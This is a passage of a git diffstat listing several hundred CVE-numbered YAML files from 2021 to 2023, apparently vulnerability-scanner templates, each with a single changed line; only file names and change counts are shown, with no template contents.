http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36748.yaml | 2 +- http/cves/2021/CVE-2021-37304.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 2 +- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 2 +- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37704.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38540.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40323.yaml | 2 +- http/cves/2021/CVE-2021-40438.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40651.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40870.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40908.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41291.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41432.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41749.yaml | 2 +- http/cves/2021/CVE-2021-4191.yaml | 2 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 2 +- http/cves/2021/CVE-2021-42887.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43421.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 2 +- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43798.yaml | 2 +- http/cves/2021/CVE-2021-43810.yaml | 2 +- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 2 +- http/cves/2021/CVE-2021-44139.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 2 +- http/cves/2021/CVE-2021-44228.yaml | 2 +- http/cves/2021/CVE-2021-44427.yaml | 2 +- http/cves/2021/CVE-2021-44451.yaml | 2 +- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45046.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45232.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45428.yaml | 2 +- http/cves/2021/CVE-2021-45968.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46069.yaml | 2 +- http/cves/2021/CVE-2021-46071.yaml | 2 +- http/cves/2021/CVE-2021-46072.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46418.yaml | 2 +- http/cves/2021/CVE-2021-46419.yaml | 2 +- http/cves/2021/CVE-2021-46422.yaml | 2 +- http/cves/2021/CVE-2021-46424.yaml | 2 +- http/cves/2021/CVE-2021-46704.yaml | 2 +- http/cves/2022/CVE-2022-0087.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 2 +- http/cves/2022/CVE-2022-0281.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0415.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0424.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0814.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0824.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0899.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1007.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1442.yaml | 2 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1580.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1903.yaml | 2 +- http/cves/2022/CVE-2022-1937.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21587.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 2 +- http/cves/2022/CVE-2022-2185.yaml | 2 +- http/cves/2022/CVE-2022-2187.yaml | 2 +- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-23854.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 2 +- http/cves/2022/CVE-2022-24181.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24264.yaml | 2 +- http/cves/2022/CVE-2022-24266.yaml | 2 +- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 2 +- http/cves/2022/CVE-2022-24627.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24716.yaml | 2 +- http/cves/2022/CVE-2022-24856.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-24900.yaml | 2 +- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25487.yaml | 2 +- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-25568.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26233.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-26352.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-26960.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27926.yaml | 2 +- http/cves/2022/CVE-2022-28023.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28080.yaml | 2 +- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29004.yaml | 2 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29007.yaml | 2 +- http/cves/2022/CVE-2022-29009.yaml | 2 +- http/cves/2022/CVE-2022-29013.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 2 +- http/cves/2022/CVE-2022-29078.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29464.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30512.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-3062.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 2 +- http/cves/2022/CVE-2022-31269.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31798.yaml | 2 +- http/cves/2022/CVE-2022-31814.yaml | 2 +- http/cves/2022/CVE-2022-31845.yaml | 2 +- http/cves/2022/CVE-2022-31846.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31879.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31981.yaml | 2 +- http/cves/2022/CVE-2022-31983.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32094.yaml | 2 +- http/cves/2022/CVE-2022-32195.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 2 +- http/cves/2022/CVE-2022-32429.yaml | 2 +- http/cves/2022/CVE-2022-32430.yaml | 2 +- http/cves/2022/CVE-2022-32444.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34046.yaml | 2 +- http/cves/2022/CVE-2022-34047.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34093.yaml | 2 +- http/cves/2022/CVE-2022-34094.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-34590.yaml | 2 +- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 2 +- http/cves/2022/CVE-2022-35416.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-35653.yaml | 2 +- http/cves/2022/CVE-2022-3578.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36553.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37190.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-38131.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-38794.yaml | 2 +- http/cves/2022/CVE-2022-38817.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-39986.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 2 +- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40083.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 2 +- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40879.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-41412.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 2 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42096.yaml | 2 +- http/cves/2022/CVE-2022-42233.yaml | 2 +- http/cves/2022/CVE-2022-42746.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4295.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43016.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4305.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-4447.yaml | 2 +- http/cves/2022/CVE-2022-44877.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- http/cves/2022/CVE-2022-44948.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 2 +- http/cves/2022/CVE-2022-45365.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 2 +- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46020.yaml | 2 +- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 +- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-46463.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-46934.yaml | 2 +- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47615.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48012.yaml | 2 +- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 2 +- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2023/CVE-2023-0099.yaml | 2 +- http/cves/2023/CVE-2023-0126.yaml | 2 +- http/cves/2023/CVE-2023-0159.yaml | 2 +- http/cves/2023/CVE-2023-0236.yaml | 2 +- http/cves/2023/CVE-2023-0297.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 2 +- http/cves/2023/CVE-2023-0448.yaml | 2 +- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0527.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0602.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0678.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-0942.yaml | 2 +- http/cves/2023/CVE-2023-0947.yaml | 2 +- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 2 +- http/cves/2023/CVE-2023-1020.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 2 +- http/cves/2023/CVE-2023-1263.yaml | 2 +- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 2 +- http/cves/2023/CVE-2023-1454.yaml | 2 +- http/cves/2023/CVE-2023-1496.yaml | 2 +- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 2 +- http/cves/2023/CVE-2023-1698.yaml | 2 +- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1780.yaml | 2 +- http/cves/2023/CVE-2023-1835.yaml | 2 +- http/cves/2023/CVE-2023-1880.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-1892.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 2 +- http/cves/2023/CVE-2023-2023.yaml | 2 +- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-20888.yaml | 2 +- http/cves/2023/CVE-2023-20889.yaml | 2 +- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 2 +- http/cves/2023/CVE-2023-2224.yaml | 2 +- http/cves/2023/CVE-2023-2227.yaml | 2 +- http/cves/2023/CVE-2023-22432.yaml | 2 +- http/cves/2023/CVE-2023-22463.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22480.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 2 +- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22527.yaml | 2 +- http/cves/2023/CVE-2023-22620.yaml | 2 +- http/cves/2023/CVE-2023-2272.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23333.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-23491.yaml | 2 +- http/cves/2023/CVE-2023-23492.yaml | 2 +- http/cves/2023/CVE-2023-2356.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-24243.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24488.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-2479.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-25157.yaml | 2 +- http/cves/2023/CVE-2023-25194.yaml | 2 +- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-25717.yaml | 2 +- http/cves/2023/CVE-2023-26035.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26347.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-26469.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- 